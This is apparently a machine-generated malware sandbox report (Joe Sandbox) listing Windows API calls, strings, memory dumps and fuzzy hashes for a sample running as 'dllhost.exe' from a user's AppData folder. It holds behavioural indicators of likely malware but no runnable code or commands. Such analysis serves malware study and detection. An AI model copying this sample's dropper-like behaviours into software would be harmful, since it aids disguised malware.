                                                                              • Opcode Fuzzy Hash: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                                                              • Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58
                                                                              APIs
                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Close$Enum
                                                                              • String ID:
                                                                              • API String ID: 464197530-0
                                                                              • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                              • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                                                              • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                              • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                                                              APIs
                                                                                • Part of subcall function 00405BC8: CharNextW.USER32(?), ref: 00405BD6
                                                                                • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                                                                • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                • Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet,?,00000000,000000F0), ref: 0040164D
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet, xrefs: 00401640
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                              • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet
                                                                              • API String ID: 1892508949-2207628267
                                                                              • Opcode ID: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                                                              • Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
                                                                              • Opcode Fuzzy Hash: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                                                              • Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E
                                                                              APIs
                                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000800), ref: 00406160
                                                                              • RegCloseKey.KERNEL32(?), ref: 0040616B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              • String ID: : Completed
                                                                              • API String ID: 3356406503-2954849223
                                                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                              • Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
                                                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                              • Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                              • CloseHandle.KERNEL32(?), ref: 00405867
                                                                              Strings
                                                                              • Error launching installer, xrefs: 00405844
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 3712363035-66219284
                                                                              • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                              • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                                                              • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                              • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                              • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                                                              • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                              • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                              • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                                                              • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                              • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                              • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                                                              • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                              • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                              • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                                                              • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                              • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                              • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                                                              • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                              • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
APIs
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
• RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
• RegCloseKey.KERNEL32(?), ref: 00402551
Similarity
• API ID: Enum$CloseValue
• String ID:
• API String ID: 397863658-0
APIs
• RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
• RegCloseKey.KERNEL32(?), ref: 00402551
Similarity
• API ID: CloseQueryValue
• String ID:
• API String ID: 3356406503-0
APIs
• MulDiv.KERNEL32 ref: 004013E4
• SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• RegDeleteValueW.ADVAPI32 ref: 004023AA
• RegCloseKey.ADVAPI32(00000000), ref: 004023B3
Similarity
• API ID: CloseDeleteValue
• String ID:
• API String ID: 2831762973-0
APIs
• OleInitialize.OLE32(00000000), ref: 00405393
  • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
• OleUninitialize.OLE32(00000404,00000000), ref: 004053DF
Similarity
• API ID: InitializeMessageSendUninitialize
• String ID:
• API String ID: 2896919175-0
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401E61
• EnableWindow.USER32(00000000,00000000), ref: 00401E6C
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
APIs
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
• Instruction ID: f017f9f214282da9378315d684086af48e7312a2d574c5b78b61c32a83121298
• Opcode Fuzzy Hash: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
• Instruction Fuzzy Hash: 45E086367001059FCB25DBA4ED848BE77A6EB48310758057FE902F36A1CA759D51CF68
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
• GetProcAddress.KERNEL32(00000000,?), ref: 00406653
  • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004065CD
  • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
  • Part of subcall function 004065B6: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
• Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
• Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
• Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
APIs
• GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
• Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
• Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
• Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
APIs
• GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D32
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
